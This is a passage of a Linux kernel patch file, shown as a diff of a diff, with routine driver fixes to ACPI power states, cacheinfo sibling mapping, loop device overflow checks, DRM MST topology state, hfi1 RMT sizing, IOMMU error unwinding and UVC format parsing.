++		: "0" (__NR_gettimeofday), "D" (tv), "S" (tz)
++		: "rcx", "r11", "memory");
+ 
+ 	return ret;
+ }
+diff --git a/drivers/acpi/device_pm.c b/drivers/acpi/device_pm.c
+index 97450f4003cc9..f007116a84276 100644
+--- a/drivers/acpi/device_pm.c
++++ b/drivers/acpi/device_pm.c
+@@ -484,6 +484,25 @@ void acpi_dev_power_up_children_with_adr(struct acpi_device *adev)
+ 	acpi_dev_for_each_child(adev, acpi_power_up_if_adr_present, NULL);
+ }
+ 
++/**
++ * acpi_dev_power_state_for_wake - Deepest power state for wakeup signaling
++ * @adev: ACPI companion of the target device.
++ *
++ * Evaluate _S0W for @adev and return the value produced by it or return
++ * ACPI_STATE_UNKNOWN on errors (including _S0W not present).
++ */
++u8 acpi_dev_power_state_for_wake(struct acpi_device *adev)
++{
++	unsigned long long state;
++	acpi_status status;
++
++	status = acpi_evaluate_integer(adev->handle, "_S0W", NULL, &state);
++	if (ACPI_FAILURE(status))
++		return ACPI_STATE_UNKNOWN;
++
++	return state;
++}
++
+ #ifdef CONFIG_PM
+ static DEFINE_MUTEX(acpi_pm_notifier_lock);
+ static DEFINE_MUTEX(acpi_pm_notifier_install_lock);
+diff --git a/drivers/auxdisplay/hd44780.c b/drivers/auxdisplay/hd44780.c
+index 8b2a0eb3f32a4..d56a5d508ccd7 100644
+--- a/drivers/auxdisplay/hd44780.c
++++ b/drivers/auxdisplay/hd44780.c
+@@ -322,8 +322,10 @@ fail1:
+ static int hd44780_remove(struct platform_device *pdev)
+ {
+ 	struct charlcd *lcd = platform_get_drvdata(pdev);
++	struct hd44780_common *hdc = lcd->drvdata;
+ 
+ 	charlcd_unregister(lcd);
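++	/* Also free the struct hd44780 that probe() hung off hd44780_common. */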
++	kfree(hdc->hd44780);
+ 	kfree(lcd->drvdata);
+ 
+ 	kfree(lcd);
+diff --git a/drivers/base/cacheinfo.c b/drivers/base/cacheinfo.c
+index 4b5cd08c5a657..f30256a524be6 100644
+--- a/drivers/base/cacheinfo.c
++++ b/drivers/base/cacheinfo.c
+@@ -251,7 +251,7 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ {
+ 	struct cpu_cacheinfo *this_cpu_ci = get_cpu_cacheinfo(cpu);
+ 	struct cacheinfo *this_leaf, *sib_leaf;
+-	unsigned int index;
++	unsigned int index, sib_index;
+ 	int ret = 0;
+ 
+ 	if (this_cpu_ci->cpu_map_populated)
+@@ -279,11 +279,13 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ 
+ 			if (i == cpu || !sib_cpu_ci->info_list)
+ 				continue;/* skip if itself or no cacheinfo */
+-
+-			sib_leaf = per_cpu_cacheinfo_idx(i, index);
+-			if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
+-				cpumask_set_cpu(cpu, &sib_leaf->shared_cpu_map);
+-				cpumask_set_cpu(i, &this_leaf->shared_cpu_map);
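++			/*
++			 * The shared cache may sit at a different index on the
++			 * sibling CPU, so scan all of its leaves.
++			 */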
++			for (sib_index = 0; sib_index < cache_leaves(i); sib_index++) {
++				sib_leaf = per_cpu_cacheinfo_idx(i, sib_index);
++				if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
++					cpumask_set_cpu(cpu, &sib_leaf->shared_cpu_map);
++					cpumask_set_cpu(i, &this_leaf->shared_cpu_map);
++					break;
++				}
+ 			}
+ 		}
+ 		/* record the maximum cache line size */
+@@ -297,7 +299,7 @@ static int cache_shared_cpu_map_setup(unsigned int cpu)
+ static void cache_shared_cpu_map_remove(unsigned int cpu)
+ {
+ 	struct cacheinfo *this_leaf, *sib_leaf;
+-	unsigned int sibling, index;
++	unsigned int sibling, index, sib_index;
+ 
+ 	for (index = 0; index < cache_leaves(cpu); index++) {
+ 		this_leaf = per_cpu_cacheinfo_idx(cpu, index);
+@@ -308,9 +310,14 @@ static void cache_shared_cpu_map_remove(unsigned int cpu)
+ 			if (sibling == cpu || !sib_cpu_ci->info_list)
+ 				continue;/* skip if itself or no cacheinfo */
+ 
+-			sib_leaf = per_cpu_cacheinfo_idx(sibling, index);
+-			cpumask_clear_cpu(cpu, &sib_leaf->shared_cpu_map);
+-			cpumask_clear_cpu(sibling, &this_leaf->shared_cpu_map);
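++			/* Mirror the setup path: match leaves by actual sharing, not by index. */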
++			for (sib_index = 0; sib_index < cache_leaves(sibling); sib_index++) {
++				sib_leaf = per_cpu_cacheinfo_idx(sibling, sib_index);
++				if (cache_leaves_are_shared(this_leaf, sib_leaf)) {
++					cpumask_clear_cpu(cpu, &sib_leaf->shared_cpu_map);
++					cpumask_clear_cpu(sibling, &this_leaf->shared_cpu_map);
++					break;
++				}
++			}
+ 		}
+ 		if (of_have_populated_dt())
+ 			of_node_put(this_leaf->fw_token);
+diff --git a/drivers/base/component.c b/drivers/base/component.c
+index 5eadeac6c5322..7dbf14a1d9157 100644
+--- a/drivers/base/component.c
++++ b/drivers/base/component.c
+@@ -125,7 +125,7 @@ static void component_debugfs_add(struct aggregate_device *m)
+ 
+ static void component_debugfs_del(struct aggregate_device *m)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(m->parent), component_debugfs_dir));
++	debugfs_lookup_and_remove(dev_name(m->parent), component_debugfs_dir);
+ }
+ 
+ #else
+diff --git a/drivers/base/dd.c b/drivers/base/dd.c
+index 9ae2b5c4fc496..c463173f1fb1a 100644
+--- a/drivers/base/dd.c
++++ b/drivers/base/dd.c
+@@ -372,7 +372,7 @@ late_initcall(deferred_probe_initcall);
+ 
+ static void __exit deferred_probe_exit(void)
+ {
+-	debugfs_remove_recursive(debugfs_lookup("devices_deferred", NULL));
++	debugfs_lookup_and_remove("devices_deferred", NULL);
+ }
+ __exitcall(deferred_probe_exit);
+ 
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index df628e30bca41..981464e561df1 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -977,13 +977,13 @@ loop_set_status_from_info(struct loop_device *lo,
+ 		return -EINVAL;
+ 	}
+ 
++	/* Avoid assigning overflow values */
++	if (info->lo_offset > LLONG_MAX || info->lo_sizelimit > LLONG_MAX)
++		return -EOVERFLOW;
++
+ 	lo->lo_offset = info->lo_offset;
+ 	lo->lo_sizelimit = info->lo_sizelimit;
+ 
+-	/* loff_t vars have been assigned __u64 */
+-	if (lo->lo_offset < 0 || lo->lo_sizelimit < 0)
+-		return -EOVERFLOW;
+-
+ 	memcpy(lo->lo_file_name, info->lo_file_name, LO_NAME_SIZE);
+ 	lo->lo_file_name[LO_NAME_SIZE-1] = 0;
+ 	lo->lo_flags = info->lo_flags;
+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index 9c42886818418..357c61c12ce5b 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -219,7 +219,7 @@ static int mhi_ep_process_cmd_ring(struct mhi_ep_ring *ring, struct mhi_ring_ele
+ 		mutex_unlock(&mhi_chan->lock);
+ 		break;
+ 	case MHI_PKT_TYPE_RESET_CHAN_CMD:
+-		dev_dbg(dev, "Received STOP command for channel (%u)\n", ch_id);
++		dev_dbg(dev, "Received RESET command for channel (%u)\n", ch_id);
+ 		if (!ch_ring->started) {
+ 			dev_err(dev, "Channel (%u) not opened\n", ch_id);
+ 			return -ENODEV;
+diff --git a/drivers/firmware/efi/sysfb_efi.c b/drivers/firmware/efi/sysfb_efi.c
+index 7882d4b3f2be4..f06fdacc9bc83 100644
+--- a/drivers/firmware/efi/sysfb_efi.c
++++ b/drivers/firmware/efi/sysfb_efi.c
+@@ -264,6 +264,14 @@ static const struct dmi_system_id efifb_dmi_swap_width_height[] __initconst = {
+ 					"Lenovo ideapad D330-10IGM"),
+ 		},
+ 	},
++	{
++		/* Lenovo IdeaPad Duet 3 10IGL5 with 1200x1920 portrait screen */
++		.matches = {
++			DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION,
++					"IdeaPad Duet 3 10IGL5"),
++		},
++	},
+ 	{},
+ };
+ 
+diff --git a/drivers/gpu/drm/display/drm_dp_mst_topology.c b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+index 4ca37261584a9..e77c674b37ca2 100644
+--- a/drivers/gpu/drm/display/drm_dp_mst_topology.c
++++ b/drivers/gpu/drm/display/drm_dp_mst_topology.c
+@@ -3309,8 +3309,13 @@ int drm_dp_add_payload_part1(struct drm_dp_mst_topology_mgr *mgr,
+ 	int ret;
+ 
+ 	port = drm_dp_mst_topology_get_port_validated(mgr, payload->port);
+-	if (!port)
++	if (!port) {
++		drm_dbg_kms(mgr->dev,
++			    "VCPI %d for port %p not in topology, not creating a payload\n",
++			    payload->vcpi, payload->port);
++		payload->vc_start_slot = -1;
+ 		return 0;
++	}
+ 
+ 	if (mgr->payload_count == 0)
+ 		mgr->next_start_slot = mst_state->start_slot;
+@@ -3644,6 +3649,9 @@ int drm_dp_mst_topology_mgr_set_mst(struct drm_dp_mst_topology_mgr *mgr, bool ms
+ 		drm_dp_dpcd_writeb(mgr->aux, DP_MSTM_CTRL, 0);
+ 		ret = 0;
+ 		mgr->payload_id_table_cleared = false;
++
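++		/*
++		 * Discard any partially received sideband messages left over
++		 * from the previous MST session.
++		 */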
++		memset(&mgr->down_rep_recv, 0, sizeof(mgr->down_rep_recv));
++		memset(&mgr->up_req_recv, 0, sizeof(mgr->up_req_recv));
+ 	}
+ 
+ out_unlock:
+@@ -3856,7 +3864,7 @@ static int drm_dp_mst_handle_down_rep(struct drm_dp_mst_topology_mgr *mgr)
+ 	struct drm_dp_sideband_msg_rx *msg = &mgr->down_rep_recv;
+ 
+ 	if (!drm_dp_get_one_sb_msg(mgr, false, &mstb))
+-		goto out;
++		goto out_clear_reply;
+ 
+ 	/* Multi-packet message transmission, don't clear the reply */
+ 	if (!msg->have_eomt)
+@@ -5354,28 +5362,53 @@ struct drm_dp_mst_topology_state *drm_atomic_get_mst_topology_state(struct drm_a
+ }
+ EXPORT_SYMBOL(drm_atomic_get_mst_topology_state);
+ 
++/**
++ * drm_atomic_get_old_mst_topology_state: get old MST topology state in atomic state, if any
++ * @state: global atomic state
++ * @mgr: MST topology manager, also the private object in this case
++ *
++ * This function wraps drm_atomic_get_old_private_obj_state() passing in the MST atomic
++ * state vtable so that the private object state returned is that of a MST
++ * topology object.
++ *
++ * Returns:
++ *
++ * The old MST topology state, or NULL if there's no topology state for this MST mgr
++ * in the global atomic state
++ */
++struct drm_dp_mst_topology_state *
++drm_atomic_get_old_mst_topology_state(struct drm_atomic_state *state,
++				      struct drm_dp_mst_topology_mgr *mgr)
++{
++	struct drm_private_state *old_priv_state =
++		drm_atomic_get_old_private_obj_state(state, &mgr->base);
++
++	return old_priv_state ? to_dp_mst_topology_state(old_priv_state) : NULL;
++}
++EXPORT_SYMBOL(drm_atomic_get_old_mst_topology_state);
++
+ /**
+  * drm_atomic_get_new_mst_topology_state: get new MST topology state in atomic state, if any
+  * @state: global atomic state
+  * @mgr: MST topology manager, also the private object in this case
+  *
+- * This function wraps drm_atomic_get_priv_obj_state() passing in the MST atomic
++ * This function wraps drm_atomic_get_new_private_obj_state() passing in the MST atomic
+  * state vtable so that the private object state returned is that of a MST
+  * topology object.
+  *
+  * Returns:
+  *
+- * The MST topology state, or NULL if there's no topology state for this MST mgr
++ * The new MST topology state, or NULL if there's no topology state for this MST mgr
+  * in the global atomic state
+  */
+ struct drm_dp_mst_topology_state *
+ drm_atomic_get_new_mst_topology_state(struct drm_atomic_state *state,
+ 				      struct drm_dp_mst_topology_mgr *mgr)
+ {
+-	struct drm_private_state *priv_state =
++	struct drm_private_state *new_priv_state =
+ 		drm_atomic_get_new_private_obj_state(state, &mgr->base);
+ 
+-	return priv_state ? to_dp_mst_topology_state(priv_state) : NULL;
++	return new_priv_state ? to_dp_mst_topology_state(new_priv_state) : NULL;
+ }
+ EXPORT_SYMBOL(drm_atomic_get_new_mst_topology_state);
+ 
+diff --git a/drivers/gpu/drm/i915/Kconfig b/drivers/gpu/drm/i915/Kconfig
+index 3efce05d7b57c..3a6e176d77aa5 100644
+--- a/drivers/gpu/drm/i915/Kconfig
++++ b/drivers/gpu/drm/i915/Kconfig
+@@ -107,9 +107,6 @@ config DRM_I915_USERPTR
+ 
+ 	  If in doubt, say "Y".
+ 
+-config DRM_I915_GVT
+-	bool
+-
+ config DRM_I915_GVT_KVMGT
+ 	tristate "Enable KVM host support Intel GVT-g graphics virtualization"
+ 	depends on DRM_I915
+@@ -160,3 +157,6 @@ menu "drm/i915 Unstable Evolution"
+ 	depends on DRM_I915
+ 	source "drivers/gpu/drm/i915/Kconfig.unstable"
+ endmenu
++
++config DRM_I915_GVT
++	bool
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index de77054195c68..4bbb84847ecb7 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -5969,6 +5969,10 @@ int intel_modeset_all_pipes(struct intel_atomic_state *state)
+ 		if (ret)
+ 			return ret;
+ 
++		ret = intel_dp_mst_add_topology_state_for_crtc(state, crtc);
++		if (ret)
++			return ret;
++
+ 		ret = intel_atomic_add_affected_planes(state, crtc);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_mst.c b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+index 03604a37931c6..27c2098dd7070 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_mst.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+@@ -1003,3 +1003,64 @@ bool intel_dp_mst_is_slave_trans(const struct intel_crtc_state *crtc_state)
+ 	return crtc_state->mst_master_transcoder != INVALID_TRANSCODER &&
+ 	       crtc_state->mst_master_transcoder != crtc_state->cpu_transcoder;
+ }
++
++/**
++ * intel_dp_mst_add_topology_state_for_connector - add MST topology state for a connector
++ * @state: atomic state
++ * @connector: connector to add the state for
++ * @crtc: the CRTC @connector is attached to
++ *
++ * Add the MST topology state for @connector to @state.
++ *
++ * Returns 0 on success, negative error code on failure.
++ */
++static int
++intel_dp_mst_add_topology_state_for_connector(struct intel_atomic_state *state,
++					      struct intel_connector *connector,
++					      struct intel_crtc *crtc)
++{
++	struct drm_dp_mst_topology_state *mst_state;
++
++	if (!connector->mst_port)
++		return 0;
++
++	mst_state = drm_atomic_get_mst_topology_state(&state->base,
++						      &connector->mst_port->mst_mgr);
++	if (IS_ERR(mst_state))
++		return PTR_ERR(mst_state);
++
++	mst_state->pending_crtc_mask |= drm_crtc_mask(&crtc->base);
++
++	return 0;
++}
++
++/**
++ * intel_dp_mst_add_topology_state_for_crtc - add MST topology state for a CRTC
++ * @state: atomic state
++ * @crtc: CRTC to add the state for
++ *
++ * Add the MST topology state for @crtc to @state.
++ *
++ * Returns 0 on success, negative error code on failure.
++ */
++int intel_dp_mst_add_topology_state_for_crtc(struct intel_atomic_state *state,
++					     struct intel_crtc *crtc)
++{
++	struct drm_connector *_connector;
++	struct drm_connector_state *conn_state;
++	int i;
++
++	for_each_new_connector_in_state(&state->base, _connector, conn_state, i) {
++		struct intel_connector *connector = to_intel_connector(_connector);
++		int ret;
++
++		if (conn_state->crtc != &crtc->base)
++			continue;
++
++		ret = intel_dp_mst_add_topology_state_for_connector(state, connector, crtc);
++		if (ret)
++			return ret;
++	}
++
++	return 0;
++}
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_mst.h b/drivers/gpu/drm/i915/display/intel_dp_mst.h
+index f7301de6cdfb3..f1815bb722672 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_mst.h
++++ b/drivers/gpu/drm/i915/display/intel_dp_mst.h
+@@ -8,6 +8,8 @@
+ 
+ #include <linux/types.h>
+ 
++struct intel_atomic_state;
++struct intel_crtc;
+ struct intel_crtc_state;
+ struct intel_digital_port;
+ struct intel_dp;
+@@ -18,5 +20,7 @@ int intel_dp_mst_encoder_active_links(struct intel_digital_port *dig_port);
+ bool intel_dp_mst_is_master_trans(const struct intel_crtc_state *crtc_state);
+ bool intel_dp_mst_is_slave_trans(const struct intel_crtc_state *crtc_state);
+ bool intel_dp_mst_source_support(struct intel_dp *intel_dp);
++int intel_dp_mst_add_topology_state_for_crtc(struct intel_atomic_state *state,
++					     struct intel_crtc *crtc);
+ 
+ #endif /* __INTEL_DP_MST_H__ */
+diff --git a/drivers/gpu/drm/i915/display/intel_fbdev.c b/drivers/gpu/drm/i915/display/intel_fbdev.c
+index 112aa0447a0dc..9899b5dcd291d 100644
+--- a/drivers/gpu/drm/i915/display/intel_fbdev.c
++++ b/drivers/gpu/drm/i915/display/intel_fbdev.c
+@@ -624,7 +624,13 @@ void intel_fbdev_set_suspend(struct drm_device *dev, int state, bool synchronous
+ 	struct intel_fbdev *ifbdev = dev_priv->display.fbdev.fbdev;
+ 	struct fb_info *info;
+ 
+-	if (!ifbdev || !ifbdev->vma)
++	if (!ifbdev)
++		return;
++
++	if (drm_WARN_ON(&dev_priv->drm, !HAS_DISPLAY(dev_priv)))
++		return;
++
++	if (!ifbdev->vma)
+ 		goto set_suspend;
+ 
+ 	info = ifbdev->helper.fbdev;
+diff --git a/drivers/iio/accel/mma9551_core.c b/drivers/iio/accel/mma9551_core.c
+index 64ca7d7a9673d..b898f865fb875 100644
+--- a/drivers/iio/accel/mma9551_core.c
++++ b/drivers/iio/accel/mma9551_core.c
+@@ -296,9 +296,12 @@ int mma9551_read_config_word(struct i2c_client *client, u8 app_id,
+ 
+ 	ret = mma9551_transfer(client, app_id, MMA9551_CMD_READ_CONFIG,
+ 			       reg, NULL, 0, (u8 *)&v, 2);
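++	/*
++	 * Bail out before *val is written so callers never consume data
++	 * from a failed transfer.
++	 */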
++	if (ret < 0)
++		return ret;
++
+ 	*val = be16_to_cpu(v);
+ 
+-	return ret;
++	return 0;
+ }
+ EXPORT_SYMBOL_NS(mma9551_read_config_word, IIO_MMA9551);
+ 
+@@ -354,9 +357,12 @@ int mma9551_read_status_word(struct i2c_client *client, u8 app_id,
+ 
+ 	ret = mma9551_transfer(client, app_id, MMA9551_CMD_READ_STATUS,
+ 			       reg, NULL, 0, (u8 *)&v, 2);
++	if (ret < 0)
++		return ret;
++
+ 	*val = be16_to_cpu(v);
+ 
+-	return ret;
++	return 0;
+ }
+ EXPORT_SYMBOL_NS(mma9551_read_status_word, IIO_MMA9551);
+ 
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index 26d1772179b8f..8730674ceb2e1 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -479,13 +479,20 @@ static int compare_netdev_and_ip(int ifindex_a, struct sockaddr *sa,
+ 	if (sa->sa_family != sb->sa_family)
+ 		return sa->sa_family - sb->sa_family;
+ 
+-	if (sa->sa_family == AF_INET)
+-		return memcmp((char *)&((struct sockaddr_in *)sa)->sin_addr,
+-			      (char *)&((struct sockaddr_in *)sb)->sin_addr,
++	if (sa->sa_family == AF_INET &&
++	    __builtin_object_size(sa, 0) >= sizeof(struct sockaddr_in)) {
++		return memcmp(&((struct sockaddr_in *)sa)->sin_addr,
++			      &((struct sockaddr_in *)sb)->sin_addr,
+ 			      sizeof(((struct sockaddr_in *)sa)->sin_addr));
++	}
++
++	if (sa->sa_family == AF_INET6 &&
++	    __builtin_object_size(sa, 0) >= sizeof(struct sockaddr_in6)) {
++		return ipv6_addr_cmp(&((struct sockaddr_in6 *)sa)->sin6_addr,
++				     &((struct sockaddr_in6 *)sb)->sin6_addr);
++	}
+ 
+-	return ipv6_addr_cmp(&((struct sockaddr_in6 *)sa)->sin6_addr,
+-			     &((struct sockaddr_in6 *)sb)->sin6_addr);
++	return -1;
+ }
+ 
+ static int cma_add_id_to_tree(struct rdma_id_private *node_id_priv)
+diff --git a/drivers/infiniband/hw/hfi1/chip.c b/drivers/infiniband/hw/hfi1/chip.c
+index ebe970f76232d..90b672feed83d 100644
+--- a/drivers/infiniband/hw/hfi1/chip.c
++++ b/drivers/infiniband/hw/hfi1/chip.c
+@@ -1056,7 +1056,7 @@ static void read_link_down_reason(struct hfi1_devdata *dd, u8 *ldr);
+ static void handle_temp_err(struct hfi1_devdata *dd);
+ static void dc_shutdown(struct hfi1_devdata *dd);
+ static void dc_start(struct hfi1_devdata *dd);
+-static int qos_rmt_entries(struct hfi1_devdata *dd, unsigned int *mp,
++static int qos_rmt_entries(unsigned int n_krcv_queues, unsigned int *mp,
+ 			   unsigned int *np);
+ static void clear_full_mgmt_pkey(struct hfi1_pportdata *ppd);
+ static int wait_link_transfer_active(struct hfi1_devdata *dd, int wait_ms);
+@@ -13362,7 +13362,6 @@ static int set_up_context_variables(struct hfi1_devdata *dd)
+ 	int ret;
+ 	unsigned ngroups;
+ 	int rmt_count;
+-	int user_rmt_reduced;
+ 	u32 n_usr_ctxts;
+ 	u32 send_contexts = chip_send_contexts(dd);
+ 	u32 rcv_contexts = chip_rcv_contexts(dd);
+@@ -13421,28 +13420,34 @@ static int set_up_context_variables(struct hfi1_devdata *dd)
+ 					 (num_kernel_contexts + n_usr_ctxts),
+ 					 &node_affinity.real_cpu_mask);
+ 	/*
+-	 * The RMT entries are currently allocated as shown below:
+-	 * 1. QOS (0 to 128 entries);
+-	 * 2. FECN (num_kernel_context - 1 + num_user_contexts +
+-	 *    num_netdev_contexts);
+-	 * 3. netdev (num_netdev_contexts).
+-	 * It should be noted that FECN oversubscribe num_netdev_contexts
+-	 * entries of RMT because both netdev and PSM could allocate any receive
+-	 * context between dd->first_dyn_alloc_text and dd->num_rcv_contexts,
+-	 * and PSM FECN must reserve an RMT entry for each possible PSM receive
+-	 * context.
++	 * RMT entries are allocated as follows:
++	 * 1. QOS (0 to 128 entries)
++	 * 2. FECN (num_kernel_contexts - 1 [a] + num_user_contexts +
++	 *          num_netdev_contexts [b])
++	 * 3. netdev (NUM_NETDEV_MAP_ENTRIES)
++	 *
++	 * Notes:
++	 * [a] Kernel contexts (except control) are included in FECN if kernel
++	 *     TID_RDMA is active.
++	 * [b] Netdev and user contexts are randomly allocated from the same
++	 *     context pool, so FECN must cover all contexts in the pool.
+ 	 */
+-	rmt_count = qos_rmt_entries(dd, NULL, NULL) + (num_netdev_contexts * 2);
+-	if (HFI1_CAP_IS_KSET(TID_RDMA))
+-		rmt_count += num_kernel_contexts - 1;
+-	if (rmt_count + n_usr_ctxts > NUM_MAP_ENTRIES) {
+-		user_rmt_reduced = NUM_MAP_ENTRIES - rmt_count;
+-		dd_dev_err(dd,
+-			   "RMT size is reducing the number of user receive contexts from %u to %d\n",
+-			   n_usr_ctxts,
+-			   user_rmt_reduced);
+-		/* recalculate */
+-		n_usr_ctxts = user_rmt_reduced;
++	rmt_count = qos_rmt_entries(num_kernel_contexts - 1, NULL, NULL)
++		    + (HFI1_CAP_IS_KSET(TID_RDMA) ? num_kernel_contexts - 1
++						  : 0)
++		    + n_usr_ctxts
++		    + num_netdev_contexts
++		    + NUM_NETDEV_MAP_ENTRIES;
++	if (rmt_count > NUM_MAP_ENTRIES) {
++		int over = rmt_count - NUM_MAP_ENTRIES;
++		/* try to squish user contexts, minimum of 1 */
++		if (over >= n_usr_ctxts) {
++			dd_dev_err(dd, "RMT overflow: reduce the requested number of contexts\n");
++			return -EINVAL;
++		}
++		dd_dev_err(dd, "RMT overflow: reducing # user contexts from %u to %u\n",
++			   n_usr_ctxts, n_usr_ctxts - over);
++		n_usr_ctxts -= over;
+ 	}
+ 
+ 	/* the first N are kernel contexts, the rest are user/netdev contexts */
+@@ -14299,15 +14304,15 @@ static void clear_rsm_rule(struct hfi1_devdata *dd, u8 rule_index)
+ }
+ 
+ /* return the number of RSM map table entries that will be used for QOS */
+-static int qos_rmt_entries(struct hfi1_devdata *dd, unsigned int *mp,
++static int qos_rmt_entries(unsigned int n_krcv_queues, unsigned int *mp,
+ 			   unsigned int *np)
+ {
+ 	int i;
+ 	unsigned int m, n;
+-	u8 max_by_vl = 0;
++	uint max_by_vl = 0;
+ 
+ 	/* is QOS active at all? */
+-	if (dd->n_krcv_queues <= MIN_KERNEL_KCTXTS ||
++	if (n_krcv_queues < MIN_KERNEL_KCTXTS ||
+ 	    num_vls == 1 ||
+ 	    krcvqsset <= 1)
+ 		goto no_qos;
+@@ -14365,7 +14370,7 @@ static void init_qos(struct hfi1_devdata *dd, struct rsm_map_table *rmt)
+ 
+ 	if (!rmt)
+ 		goto bail;
+-	rmt_entries = qos_rmt_entries(dd, &m, &n);
++	rmt_entries = qos_rmt_entries(dd->n_krcv_queues - 1, &m, &n);
+ 	if (rmt_entries == 0)
+ 		goto bail;
+ 	qpns_per_vl = 1 << m;
+diff --git a/drivers/iommu/amd/iommu.c b/drivers/iommu/amd/iommu.c
+index 968e5e6668b26..20adb9b323d82 100644
+--- a/drivers/iommu/amd/iommu.c
++++ b/drivers/iommu/amd/iommu.c
+@@ -1712,27 +1712,29 @@ static int pdev_pri_ats_enable(struct pci_dev *pdev)
+ 	/* Only allow access to user-accessible pages */
+ 	ret = pci_enable_pasid(pdev, 0);
+ 	if (ret)
+-		goto out_err;
++		return ret;
+ 
+ 	/* First reset the PRI state of the device */
+ 	ret = pci_reset_pri(pdev);
+ 	if (ret)
+-		goto out_err;
++		goto out_err_pasid;
+ 
+ 	/* Enable PRI */
+ 	/* FIXME: Hardcode number of outstanding requests for now */
+ 	ret = pci_enable_pri(pdev, 32);
+ 	if (ret)
+-		goto out_err;
++		goto out_err_pasid;
+ 
+ 	ret = pci_enable_ats(pdev, PAGE_SHIFT);
+ 	if (ret)
+-		goto out_err;
++		goto out_err_pri;
+ 
+ 	return 0;
+ 
+-out_err:
++out_err_pri:
+ 	pci_disable_pri(pdev);
++
++out_err_pasid:
+ 	pci_disable_pasid(pdev);
+ 
+ 	return ret;
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index fd8c8aeb3c504..bfb2f163c6914 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -2089,8 +2089,22 @@ static int __iommu_attach_group(struct iommu_domain *domain,
+ 
+ 	ret = __iommu_group_for_each_dev(group, domain,
+ 					 iommu_group_do_attach_device);
+-	if (ret == 0)
++	if (ret == 0) {
+ 		group->domain = domain;
++	} else {
++		/*
++		 * To recover from the case where a device within the group
++		 * fails to attach to the new domain, force all devices back
++		 * to the old domain. The old domain is compatible with every
++		 * device in the group, hence the iommu driver should always
++		 * return success.
++		 */
++		struct iommu_domain *old_domain = group->domain;
++
++		group->domain = NULL;
++		WARN(__iommu_group_set_domain(group, old_domain),
++		     "iommu driver failed to attach a compatible domain");
++	}
+ 
+ 	return ret;
+ }
+diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
+index 44b0cfb8ee1c7..067b43a1cb3eb 100644
+--- a/drivers/media/usb/uvc/uvc_ctrl.c
++++ b/drivers/media/usb/uvc/uvc_ctrl.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <asm/barrier.h>
+ #include <linux/bitops.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+@@ -1509,6 +1510,10 @@ static void uvc_ctrl_status_event_work(struct work_struct *work)
+ 
+ 	uvc_ctrl_status_event(w->chain, w->ctrl, w->data);
+ 
++	/* The barrier is needed to synchronize with uvc_status_stop(). */
++	if (smp_load_acquire(&dev->flush_status))
++		return;
++
+ 	/* Resubmit the URB. */
+ 	w->urb->interval = dev->int_ep->desc.bInterval;
+ 	ret = usb_submit_urb(w->urb, GFP_KERNEL);
+diff --git a/drivers/media/usb/uvc/uvc_driver.c b/drivers/media/usb/uvc/uvc_driver.c
+index abfe735f6ea30..a9cdef07e6b14 100644
+--- a/drivers/media/usb/uvc/uvc_driver.c
++++ b/drivers/media/usb/uvc/uvc_driver.c
+@@ -252,14 +252,10 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		fmtdesc = uvc_format_by_guid(&buffer[5]);
+ 
+ 		if (fmtdesc != NULL) {
+-			strscpy(format->name, fmtdesc->name,
+-				sizeof(format->name));
+ 			format->fcc = fmtdesc->fcc;
+ 		} else {
+ 			dev_info(&streaming->intf->dev,
+ 				 "Unknown video format %pUl\n", &buffer[5]);
+-			snprintf(format->name, sizeof(format->name), "%pUl\n",
+-				&buffer[5]);
+ 			format->fcc = 0;
+ 		}
+ 
+@@ -271,8 +267,6 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		 */
+ 		if (dev->quirks & UVC_QUIRK_FORCE_Y8) {
+ 			if (format->fcc == V4L2_PIX_FMT_YUYV) {
+-				strscpy(format->name, "Greyscale 8-bit (Y8  )",
+-					sizeof(format->name));
+ 				format->fcc = V4L2_PIX_FMT_GREY;
+ 				format->bpp = 8;
+ 				width_multiplier = 2;
+@@ -313,7 +307,6 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 			return -EINVAL;
+ 		}
+ 
+-		strscpy(format->name, "MJPEG", sizeof(format->name));
+ 		format->fcc = V4L2_PIX_FMT_MJPEG;
+ 		format->flags = UVC_FMT_FLAG_COMPRESSED;
+ 		format->bpp = 0;
+@@ -329,17 +322,7 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 			return -EINVAL;
+ 		}
+ 
+-		switch (buffer[8] & 0x7f) {
+-		case 0:
+-			strscpy(format->name, "SD-DV", sizeof(format->name));
+-			break;
+-		case 1:
+-			strscpy(format->name, "SDL-DV", sizeof(format->name));
+-			break;
+-		case 2:
+-			strscpy(format->name, "HD-DV", sizeof(format->name));
+-			break;
